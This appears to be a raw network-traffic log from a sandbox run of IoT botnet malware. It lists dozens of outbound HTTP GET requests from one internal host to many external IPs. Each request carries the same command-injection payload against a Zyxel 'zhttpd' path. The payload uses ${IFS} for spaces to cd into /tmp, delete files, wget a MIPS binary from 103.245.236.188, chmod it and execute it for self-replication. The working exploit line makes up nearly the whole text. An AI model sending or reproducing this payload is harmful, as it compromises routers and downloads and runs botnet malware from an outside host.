                                    Jan 13, 2024 19:02:33.154084921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4153192.168.2.134961013.72.76.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154134035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4154192.168.2.1343604114.160.238.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154143095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4155192.168.2.135136293.21.61.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154182911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4156192.168.2.1356770178.235.227.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154191017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4157192.168.2.1341836119.30.111.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154232025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4158192.168.2.1345710133.57.104.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154278040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4159192.168.2.133922038.10.73.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154321909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4160192.168.2.1356740156.23.197.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154385090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4161192.168.2.1348456188.102.74.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154405117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4162192.168.2.1345234203.212.64.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154453039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4163192.168.2.135190678.202.149.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154480934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4164192.168.2.13506809.138.108.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154505968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4165192.168.2.135805497.182.150.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154576063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4166192.168.2.1348626173.39.12.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154611111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4167192.168.2.134984888.244.108.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154671907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4168192.168.2.1339040212.244.85.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154716015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4169192.168.2.1352270168.143.208.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154748917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4170192.168.2.1333714199.30.95.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154813051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4171192.168.2.135959835.223.149.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154844046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4172192.168.2.135160860.14.42.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154876947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4173192.168.2.133833643.72.133.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154912949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4174192.168.2.1352630154.52.177.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.154958010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4175192.168.2.1360494109.180.118.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155000925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4176192.168.2.1337670194.117.69.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155038118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4177192.168.2.135658485.165.149.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155056953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4178192.168.2.1340370172.85.115.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155103922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4179192.168.2.1337864172.50.119.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155119896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4180192.168.2.1339358184.111.64.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155154943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4181192.168.2.1333420169.49.76.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155184031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4182192.168.2.134737093.178.202.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155235052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4183192.168.2.133716823.253.226.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155277967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4184192.168.2.1335250124.13.209.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155292988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4185192.168.2.1357062152.87.205.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155332088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4186192.168.2.135951470.109.224.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155375957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4187192.168.2.1334630113.216.155.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155416965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4188192.168.2.1359390190.203.197.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155486107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4189192.168.2.133833871.178.171.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155488014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4190192.168.2.133540467.60.36.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155519009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4191192.168.2.133611459.213.67.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155550957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4192192.168.2.135164614.63.199.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155563116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4193192.168.2.1350270119.75.49.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155610085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4194192.168.2.1334832189.161.65.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155685902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4195192.168.2.1333810104.15.92.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155687094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4196192.168.2.1355940210.27.235.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155720949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4197192.168.2.1355008194.131.200.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155755997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4198192.168.2.133936876.175.218.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155782938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4199192.168.2.1334696205.79.132.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155817032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4200192.168.2.134968440.164.222.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155853033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4201192.168.2.133854297.56.255.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155904055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4202192.168.2.1335698193.22.107.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.155944109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4203192.168.2.1359988192.191.115.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156003952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4204192.168.2.134199441.62.241.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156018019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4205192.168.2.1360422176.88.228.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156069994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4206192.168.2.1337064217.54.30.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156078100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4207192.168.2.135850619.52.231.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156109095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4208192.168.2.1357374203.23.184.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156147003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4209192.168.2.1353016145.54.29.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156172991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4210192.168.2.1344574126.55.159.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156203985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4211192.168.2.133703060.128.56.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156245947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4212192.168.2.134790020.180.152.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156303883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4213192.168.2.1338602223.59.62.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156322956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4214192.168.2.1347124108.31.182.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156389952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4215192.168.2.13413785.102.142.43443
                                    TimestampBytes transferredDirectionData
